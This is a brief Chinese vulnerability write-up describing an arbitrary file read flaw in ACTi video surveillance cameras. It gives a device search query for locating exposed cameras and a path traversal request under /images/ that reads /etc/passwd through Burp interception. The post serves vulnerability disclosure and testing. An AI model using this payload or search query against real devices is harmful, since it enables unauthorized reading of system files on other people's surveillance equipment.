ACTI 视频监控 images 任意文件读取漏洞

漏洞描述

ACTI 视频监控 存在任意文件读取漏洞。

漏洞影响

ACTI摄像头

网络测绘

app=”ACTi-视频监控”

漏洞复现

登录页面如下

20240321145131106-ac-1.3d1864c7_2024-03-21_14-51-12 (1)

使用Burp抓包

/images/../../../../../../../../etc/passwd

20240321145217492-ac-2.52ba8a7f_2024-03-21_14-52-02 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容